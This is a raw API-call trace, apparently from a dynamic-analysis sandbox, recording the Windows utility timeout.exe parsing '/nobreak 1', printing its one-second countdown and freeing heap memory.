[0372.987] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24fdb0 | out: lpSystemTimeAsFileTime=0x24fdb0*(dwLowDateTime=0xf6618e80, dwHighDateTime=0x1dab598))
[0372.987] GetCurrentProcessId () returned 0xc10
[0372.987] GetCurrentThreadId () returned 0xc0c
[0372.987] GetTickCount () returned 0x1425824
[0372.987] QueryPerformanceCounter (in: lpPerformanceCount=0x24fdb8 | out: lpPerformanceCount=0x24fdb8*=2125368437262) returned 1
[0372.988] GetModuleHandleW (lpModuleName=0x0) returned 0xff740000
[0372.988] __set_app_type (_Type=0x1)
[0372.988] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff746888) returned 0x0
[0372.991] __wgetmainargs (in: _Argc=0xff748140, _Argv=0xff748150, _Env=0xff748148, _DoWildCard=0, _StartInfo=0xff74815c | out: _Argc=0xff748140, _Argv=0xff748150, _Env=0xff748148) returned 0
[0372.992] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0372.995] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
[0372.995] SetLastError (dwErrCode=0x0)
[0372.996] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x2, Condition=0x3) returned 0x8000000000000018
[0372.996] VerSetConditionMask (ConditionMask=0x8000000000000018, TypeMask=0x1, Condition=0x3) returned 0x800000000000001b
[0372.996] VerSetConditionMask (ConditionMask=0x800000000000001b, TypeMask=0x20, Condition=0x3) returned 0x800000000001801b
[0372.996] VerifyVersionInfoW (in: lpVersionInformation=0x24f4d0, dwTypeMask=0x3, dwlConditionMask=0x800000000001801b | out: lpVersionInformation=0x24f4d0) returned 1
[0372.996] GetProcessHeap () returned 0x410000
[0372.996] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x18) returned 0x4291e0
[0372.996] lstrlenW (lpString="") returned 0
[0372.997] GetProcessHeap () returned 0x410000
[0372.997] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x2) returned 0x429200
[0372.997] GetProcessHeap () returned 0x410000
[0372.997] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x20) returned 0x4278e0
[0372.997] GetProcessHeap () returned 0x410000
[0372.997] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x18) returned 0x429220
[0372.997] GetProcessHeap () returned 0x410000
[0372.997] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x20) returned 0x427910
[0372.997] GetProcessHeap () returned 0x410000
[0372.997] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x20) returned 0x427940
[0372.997] GetProcessHeap () returned 0x410000
[0372.997] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x20) returned 0x427970
[0372.997] GetProcessHeap () returned 0x410000
[0372.997] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x20) returned 0x4279a0
[0372.997] GetProcessHeap () returned 0x410000
[0372.998] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x18) returned 0x429240
[0372.998] GetProcessHeap () returned 0x410000
[0372.998] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x20) returned 0x4279d0
[0372.998] GetProcessHeap () returned 0x410000
[0372.998] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x20) returned 0x427a00
[0372.998] GetProcessHeap () returned 0x410000
[0372.998] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x20) returned 0x427a30
[0372.998] GetProcessHeap () returned 0x410000
[0372.998] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x20) returned 0x427a60
[0372.998] GetProcessHeap () returned 0x410000
[0372.998] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x18) returned 0x429260
[0372.998] GetProcessHeap () returned 0x410000
[0372.998] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x20) returned 0x427a90
[0372.998] GetProcessHeap () returned 0x410000
[0372.998] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x20) returned 0x427ac0
[0372.998] GetProcessHeap () returned 0x410000
[0372.998] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x20) returned 0x427af0
[0372.998] GetProcessHeap () returned 0x410000
[0372.999] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x20) returned 0x427b20
[0372.999] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0372.999] SetLastError (dwErrCode=0x0)
[0372.999] GetProcessHeap () returned 0x410000
[0372.999] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x20) returned 0x427b50
[0372.999] GetProcessHeap () returned 0x410000
[0372.999] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x20) returned 0x427b80
[0372.999] GetProcessHeap () returned 0x410000
[0372.999] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x20) returned 0x427bb0
[0373.000] GetProcessHeap () returned 0x410000
[0373.000] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x20) returned 0x427be0
[0373.000] GetProcessHeap () returned 0x410000
[0373.000] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x20) returned 0x427c10
[0373.000] GetProcessHeap () returned 0x410000
[0373.000] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x18) returned 0x42b530
[0373.000] _memicmp (_Buf1=0x42b530, _Buf2=0xff741398, _Size=0x7) returned 0
[0373.000] GetProcessHeap () returned 0x410000
[0373.000] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x208) returned 0x42b550
[0373.000] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x42b550, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\timeout.exe" (normalized: "c:\\windows\\system32\\timeout.exe")) returned 0x1f
[0373.000] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\system32\\timeout.exe", lpdwHandle=0x0 | out: lpdwHandle=0x0) returned 0x76c
[0373.008] GetProcessHeap () returned 0x410000
[0373.008] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x776) returned 0x42b760
[0373.008] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\system32\\timeout.exe", dwHandle=0x0, dwLen=0x776, lpData=0x42b760 | out: lpData=0x42b760) returned 1
[0373.009] VerQueryValueW (in: pBlock=0x42b760, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x24f5b8, puLen=0x24f620 | out: lplpBuffer=0x24f5b8*=0x42bb10, puLen=0x24f620) returned 1
[0373.014] _memicmp (_Buf1=0x42b530, _Buf2=0xff741398, _Size=0x7) returned 0
[0373.014] _vsnwprintf (in: _Buffer=0x42b550, _BufferCount=0x3f, _Format="\\StringFileInfo\\%04x%04x\\InternalName", _ArgList=0x24f598 | out: _Buffer="\\StringFileInfo\\040904b0\\InternalName") returned 37
[0373.014] VerQueryValueW (in: pBlock=0x42b760, lpSubBlock="\\StringFileInfo\\040904b0\\InternalName", lplpBuffer=0x24f628, puLen=0x24f618 | out: lplpBuffer=0x24f628*=0x42b940, puLen=0x24f618) returned 1
[0373.014] lstrlenW (lpString="timeout.exe") returned 11
[0373.014] lstrlenW (lpString="timeout.exe") returned 11
[0373.014] lstrlenW (lpString=".EXE") returned 4
[0373.014] StrStrIW (lpFirst="timeout.exe", lpSrch=".EXE") returned=".exe"
[0373.018] lstrlenW (lpString="timeout.exe") returned 11
[0373.018] lstrlenW (lpString=".EXE") returned 4
[0373.018] _memicmp (_Buf1=0x42b530, _Buf2=0xff741398, _Size=0x7) returned 0
[0373.018] lstrlenW (lpString="timeout") returned 7
[0373.018] GetProcessHeap () returned 0x410000
[0373.018] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x20) returned 0x427c70
[0373.018] GetProcessHeap () returned 0x410000
[0373.018] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x20) returned 0x427ca0
[0373.019] GetProcessHeap () returned 0x410000
[0373.019] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x20) returned 0x427cd0
[0373.019] GetProcessHeap () returned 0x410000
[0373.019] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x20) returned 0x427d00
[0373.019] GetProcessHeap () returned 0x410000
[0373.019] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x18) returned 0x42c250
[0373.019] _memicmp (_Buf1=0x42c250, _Buf2=0xff741398, _Size=0x7) returned 0
[0373.019] GetProcessHeap () returned 0x410000
[0373.019] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0xa0) returned 0x42c270
[0373.019] GetProcessHeap () returned 0x410000
[0373.019] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x20) returned 0x427d30
[0373.019] GetProcessHeap () returned 0x410000
[0373.019] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x20) returned 0x427d60
[0373.020] GetProcessHeap () returned 0x410000
[0373.020] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x20) returned 0x427d90
[0373.020] GetProcessHeap () returned 0x410000
[0373.020] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x18) returned 0x42c320
[0373.020] _memicmp (_Buf1=0x42c320, _Buf2=0xff741398, _Size=0x7) returned 0
[0373.020] GetProcessHeap () returned 0x410000
[0373.020] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x200) returned 0x42c340
[0373.020] LoadStringW (in: hInstance=0x0, uID=0x15ed, lpBuffer=0x42c340, cchBufferMax=256 | out: lpBuffer="Type \"%s /?\" for usage.") returned 0x17
[0373.021] lstrlenW (lpString="Type \"%s /?\" for usage.") returned 23
[0373.021] GetProcessHeap () returned 0x410000
[0373.021] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x30) returned 0x427150
[0373.021] _vsnwprintf (in: _Buffer=0x42c270, _BufferCount=0x4f, _Format="Type \"%s /?\" for usage.", _ArgList=0x24f598 | out: _Buffer="Type \"TIMEOUT /?\" for usage.") returned 28
[0373.021] GetProcessHeap () returned 0x410000
[0373.021] GetProcessHeap () returned 0x410000
[0373.021] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x42b760) returned 1
[0373.022] GetProcessHeap () returned 0x410000
[0373.022] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x42b760) returned 0x776
[0373.022] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42b760 | out: hHeap=0x410000) returned 1
[0373.023] SetLastError (dwErrCode=0x0)
[0373.023] GetThreadLocale () returned 0x409
[0373.023] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0373.115] lstrlenW (lpString="?") returned 1
[0373.115] GetThreadLocale () returned 0x409
[0373.115] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0373.115] GetThreadLocale () returned 0x409
[0373.115] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0373.115] lstrlenW (lpString="nobreak") returned 7
[0373.115] SetLastError (dwErrCode=0x0)
[0373.115] SetLastError (dwErrCode=0x0)
[0373.115] lstrlenW (lpString="1") returned 1
[0373.116] SetLastError (dwErrCode=0x490)
[0373.116] SetLastError (dwErrCode=0x0)
[0373.116] lstrlenW (lpString="1") returned 1
[0373.116] StrChrIW (lpStart="1", wMatch=0x3a) returned 0x0
[0373.116] SetLastError (dwErrCode=0x490)
[0373.116] SetLastError (dwErrCode=0x0)
[0373.116] GetProcessHeap () returned 0x410000
[0373.116] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x18) returned 0x42b760
[0373.116] _memicmp (_Buf1=0x42b760, _Buf2=0xff741398, _Size=0x7) returned 0
[0373.116] lstrlenW (lpString="1") returned 1
[0373.116] GetProcessHeap () returned 0x410000
[0373.116] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x4) returned 0x42b780
[0373.116] lstrlenW (lpString="1") returned 1
[0373.116] lstrlenW (lpString=" \x09") returned 2
[0373.117] StrChrW (lpStart=" \x09", wMatch=0x31) returned 0x0
[0373.117] StrChrW (lpStart=" \x09", wMatch=0x31) returned 0x0
[0373.117] GetLastError () returned 0x0
[0373.117] lstrlenW (lpString="1") returned 1
[0373.118] lstrlenW (lpString="1") returned 1
[0373.118] SetLastError (dwErrCode=0x0)
[0373.118] _errno () returned 0x134bb0
[0373.118] wcstol (in: _String="1", _EndPtr=0x24f8f8, _Radix=10 | out: _EndPtr=0x24f8f8*="") returned 1
[0373.118] lstrlenW (lpString="") returned 0
[0373.118] _errno () returned 0x134bb0
[0373.118] time (in: timer=0x24f8e0 | out: timer=0x24f8e0) returned 0x665d8db1
[0373.118] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0373.118] GetFileType (hFile=0x3) returned 0x2
[0373.120] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x24f8ec | out: lpMode=0x24f8ec) returned 1
[0373.121] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0373.121] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x24f8e8 | out: lpMode=0x24f8e8) returned 1
[0373.122] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a1) returned 1
[0373.122] GetNumberOfConsoleInputEvents (in: hConsoleInput=0x3, lpNumberOfEvents=0x24f8d4 | out: lpNumberOfEvents=0x24f8d4) returned 1
[0373.123] FlushConsoleInputBuffer (hConsoleInput=0x3) returned 1
[0373.124] GetProcessHeap () returned 0x410000
[0373.124] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x20) returned 0x427dc0
[0373.124] _memicmp (_Buf1=0x42c320, _Buf2=0xff741398, _Size=0x7) returned 0
[0373.124] LoadStringW (in: hInstance=0x0, uID=0x98, lpBuffer=0x42c340, cchBufferMax=256 | out: lpBuffer="\nWaiting for %*lu") returned 0x11
[0373.124] lstrlenW (lpString="\nWaiting for %*lu") returned 17
[0373.125] GetProcessHeap () returned 0x410000
[0373.125] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x24) returned 0x427df0
[0373.125] _vsnwprintf (in: _Buffer=0x24f960, _BufferCount=0xfd, _Format="\nWaiting for %*lu", _ArgList=0x24f8b8 | out: _Buffer="\nWaiting for 1") returned 14
[0373.125] __iob_func () returned 0x7feff862a80
[0373.125] _fileno (_File=0x7feff862ab0) returned 1
[0373.125] _errno () returned 0x134bb0
[0373.125] _get_osfhandle (_FileHandle=1) returned 0x7
[0373.125] _errno () returned 0x134bb0
[0373.125] GetFileType (hFile=0x7) returned 0x2
[0373.126] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0373.126] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x24f830 | out: lpMode=0x24f830) returned 1
[0373.127] __iob_func () returned 0x7feff862a80
[0373.127] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0373.127] lstrlenW (lpString="\nWaiting for 1") returned 14
[0373.127] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x24f960*, nNumberOfCharsToWrite=0xe, lpNumberOfCharsWritten=0x24f8a0, lpReserved=0x0 | out: lpBuffer=0x24f960*, lpNumberOfCharsWritten=0x24f8a0*=0xe) returned 1
[0373.129] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0373.129] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x24f928 | out: lpConsoleScreenBufferInfo=0x24f928) returned 1
[0373.129] GetProcessHeap () returned 0x410000
[0373.130] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x20) returned 0x427e20
[0373.130] _memicmp (_Buf1=0x42c320, _Buf2=0xff741398, _Size=0x7) returned 0
[0373.130] LoadStringW (in: hInstance=0x0, uID=0xa0, lpBuffer=0x42c340, cchBufferMax=256 | out: lpBuffer=" seconds, press a key to continue ...") returned 0x25
[0373.130] lstrlenW (lpString=" seconds, press a key to continue ...") returned 37
[0373.130] GetProcessHeap () returned 0x410000
[0373.130] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x4c) returned 0x42b7a0
[0373.130] __iob_func () returned 0x7feff862a80
[0373.130] _fileno (_File=0x7feff862ab0) returned 1
[0373.130] _errno () returned 0x134bb0
[0373.130] _get_osfhandle (_FileHandle=1) returned 0x7
[0373.130] _errno () returned 0x134bb0
[0373.130] GetFileType (hFile=0x7) returned 0x2
[0373.131] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0373.131] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x24f830 | out: lpMode=0x24f830) returned 1
[0373.132] __iob_func () returned 0x7feff862a80
[0373.132] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0373.132] lstrlenW (lpString=" seconds, press a key to continue ...") returned 37
[0373.132] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x42b7a0*, nNumberOfCharsToWrite=0x25, lpNumberOfCharsWritten=0x24f8a0, lpReserved=0x0 | out: lpBuffer=0x42b7a0*, lpNumberOfCharsWritten=0x24f8a0*=0x25) returned 1
[0373.133] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x24f900, nLength=0x2, lpNumberOfEventsRead=0x24f8d4 | out: lpBuffer=0x24f900, lpNumberOfEventsRead=0x24f8d4) returned 1
[0373.134] time (in: timer=0x24f8e0 | out: timer=0x24f8e0) returned 0x665d8db1
[0373.134] Sleep (dwMilliseconds=0x64)
[0373.375] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x24f900, nLength=0x2, lpNumberOfEventsRead=0x24f8d4 | out: lpBuffer=0x24f900, lpNumberOfEventsRead=0x24f8d4) returned 1
[0373.376] time (in: timer=0x24f8e0 | out: timer=0x24f8e0) returned 0x665d8db1
[0373.376] Sleep (dwMilliseconds=0x64)
[0373.477] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x24f900, nLength=0x2, lpNumberOfEventsRead=0x24f8d4 | out: lpBuffer=0x24f900, lpNumberOfEventsRead=0x24f8d4) returned 1
[0373.478] time (in: timer=0x24f8e0 | out: timer=0x24f8e0) returned 0x665d8db1
[0373.478] Sleep (dwMilliseconds=0x64)
[0373.589] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x24f900, nLength=0x2, lpNumberOfEventsRead=0x24f8d4 | out: lpBuffer=0x24f900, lpNumberOfEventsRead=0x24f8d4) returned 1
[0373.589] time (in: timer=0x24f8e0 | out: timer=0x24f8e0) returned 0x665d8db2
[0373.590] _vsnwprintf (in: _Buffer=0x24f960, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x24f8b8 | out: _Buffer="\x080") returned 2
[0373.590] SetConsoleCursorPosition (hConsoleOutput=0x7, dwCursorPosition=0x2000d) returned 1
[0373.590] __iob_func () returned 0x7feff862a80
[0373.590] _fileno (_File=0x7feff862ab0) returned 1
[0373.590] _errno () returned 0x134bb0
[0373.590] _get_osfhandle (_FileHandle=1) returned 0x7
[0373.591] _errno () returned 0x134bb0
[0373.591] GetFileType (hFile=0x7) returned 0x2
[0373.591] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0373.591] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x24f830 | out: lpMode=0x24f830) returned 1
[0373.592] __iob_func () returned 0x7feff862a80
[0373.592] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0373.592] lstrlenW (lpString="\x080") returned 2
[0373.592] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x24f960*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x24f8a0, lpReserved=0x0 | out: lpBuffer=0x24f960*, lpNumberOfCharsWritten=0x24f8a0*=0x2) returned 1
[0373.593] Sleep (dwMilliseconds=0x64)
[0373.695] __iob_func () returned 0x7feff862a80
[0373.695] _fileno (_File=0x7feff862ab0) returned 1
[0373.695] _errno () returned 0x134bb0
[0373.696] _get_osfhandle (_FileHandle=1) returned 0x7
[0373.696] _errno () returned 0x134bb0
[0373.696] GetFileType (hFile=0x7) returned 0x2
[0373.696] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0373.696] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x24f830 | out: lpMode=0x24f830) returned 1
[0373.697] __iob_func () returned 0x7feff862a80
[0373.697] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0373.697] lstrlenW (lpString="\n") returned 1
[0373.697] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff741358*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x24f8a0, lpReserved=0x0 | out: lpBuffer=0xff741358*, lpNumberOfCharsWritten=0x24f8a0*=0x1) returned 1
[0373.698] GetProcessHeap () returned 0x410000
[0373.698] GetProcessHeap () returned 0x410000
[0373.698] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x42c270) returned 1
[0373.698] GetProcessHeap () returned 0x410000
[0373.698] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x42c270) returned 0xa0
[0373.699] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42c270 | out: hHeap=0x410000) returned 1
[0373.700] GetProcessHeap () returned 0x410000
[0373.700] GetProcessHeap () returned 0x410000
[0373.700] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x42c250) returned 1
[0373.700] GetProcessHeap () returned 0x410000
[0373.700] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x42c250) returned 0x18
[0373.700] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42c250 | out: hHeap=0x410000) returned 1
[0373.700] GetProcessHeap () returned 0x410000
[0373.700] GetProcessHeap () returned 0x410000
[0373.700] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x427d00) returned 1
[0373.700] GetProcessHeap () returned 0x410000
[0373.700] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x427d00) returned 0x20
[0373.701] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427d00 | out: hHeap=0x410000) returned 1
[0373.701] GetProcessHeap () returned 0x410000
[0373.701] GetProcessHeap () returned 0x410000
[0373.701] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x42b780) returned 1
[0373.701] GetProcessHeap () returned 0x410000
[0373.701] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x42b780) returned 0x4
[0373.702] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42b780 | out: hHeap=0x410000) returned 1
[0373.702] GetProcessHeap () returned 0x410000
[0373.702] GetProcessHeap () returned 0x410000
[0373.702] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x42b760) returned 1
[0373.702] GetProcessHeap () returned 0x410000
[0373.702] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x42b760) returned 0x18
[0373.702] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42b760 | out: hHeap=0x410000) returned 1
[0373.702] GetProcessHeap () returned 0x410000
[0373.702] GetProcessHeap () returned 0x410000
[0373.702] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x427cd0) returned 1
[0373.702] GetProcessHeap () returned 0x410000
[0373.702] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x427cd0) returned 0x20
[0373.703] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427cd0 | out: hHeap=0x410000) returned 1
[0373.703] GetProcessHeap () returned 0x410000
[0373.703] GetProcessHeap () returned 0x410000
[0373.703] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x42b550) returned 1
[0373.703] GetProcessHeap () returned 0x410000
[0373.703] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x42b550) returned 0x208
[0373.704] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42b550 | out: hHeap=0x410000) returned 1
[0373.704] GetProcessHeap () returned 0x410000
[0373.704] GetProcessHeap () returned 0x410000
[0373.704] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x42b530) returned 1
[0373.704] GetProcessHeap () returned 0x410000
[0373.704] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x42b530) returned 0x18
[0373.704] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42b530 | out: hHeap=0x410000) returned 1
[0373.704] GetProcessHeap () returned 0x410000
[0373.705] GetProcessHeap () returned 0x410000
[0373.705] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x427c10) returned 1
[0373.705] GetProcessHeap () returned 0x410000
[0373.705] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x427c10) returned 0x20
[0373.705] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427c10 | out: hHeap=0x410000) returned 1
[0373.705] GetProcessHeap () returned 0x410000
[0373.705] GetProcessHeap () returned 0x410000
[0373.706] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x42c340) returned 1
[0373.706] GetProcessHeap () returned 0x410000
[0373.706] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x42c340) returned 0x200
[0373.706] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42c340 | out: hHeap=0x410000) returned 1
[0373.706] GetProcessHeap () returned 0x410000
[0373.706] GetProcessHeap () returned 0x410000
[0373.707] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x42c320) returned 1
[0373.707] GetProcessHeap () returned 0x410000
[0373.707] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x42c320) returned 0x18
[0373.707] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42c320 | out: hHeap=0x410000) returned 1
[0373.707] GetProcessHeap () returned 0x410000
[0373.707] GetProcessHeap () returned 0x410000
[0373.707] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x427b80) returned 1
[0373.707] GetProcessHeap () returned 0x410000
[0373.707] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x427b80) returned 0x20
[0373.708] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427b80 | out: hHeap=0x410000) returned 1
[0373.708] GetProcessHeap () returned 0x410000
[0373.708] GetProcessHeap () returned 0x410000
[0373.709] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x429200) returned 1
[0373.709] GetProcessHeap () returned 0x410000
[0373.709] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x429200) returned 0x2
[0373.709] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x429200 | out: hHeap=0x410000) returned 1
[0373.709] GetProcessHeap () returned 0x410000
[0373.709] GetProcessHeap () returned 0x410000
[0373.709] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x4278e0) returned 1
[0373.709] GetProcessHeap () returned 0x410000
[0373.709] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x4278e0) returned 0x20
[0373.710] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4278e0 | out: hHeap=0x410000) returned 1
[0373.710] GetProcessHeap () returned 0x410000
[0373.710] GetProcessHeap () returned 0x410000
[0373.710] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x427910) returned 1
[0373.710] GetProcessHeap () returned 0x410000
[0373.710] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x427910) returned 0x20
[0373.711] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427910 | out: hHeap=0x410000) returned 1
[0373.711] GetProcessHeap () returned 0x410000
[0373.711] GetProcessHeap () returned 0x410000
[0373.711] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x427940) returned 1
[0373.711] GetProcessHeap () returned 0x410000
[0373.711] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x427940) returned 0x20
[0373.712] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427940 | out: hHeap=0x410000) returned 1
[0373.712] GetProcessHeap () returned 0x410000
[0373.712] GetProcessHeap () returned 0x410000
[0373.712] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x427970) returned 1
[0373.712] GetProcessHeap () returned 0x410000
[0373.712] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x427970) returned 0x20
[0373.713] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427970 | out: hHeap=0x410000) returned 1
[0373.713] GetProcessHeap () returned 0x410000
[0373.713] GetProcessHeap () returned 0x410000
[0373.713] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x427d30) returned 1
[0373.713] GetProcessHeap () returned 0x410000
[0373.713] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x427d30) returned 0x20
[0373.714] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427d30 | out: hHeap=0x410000) returned 1
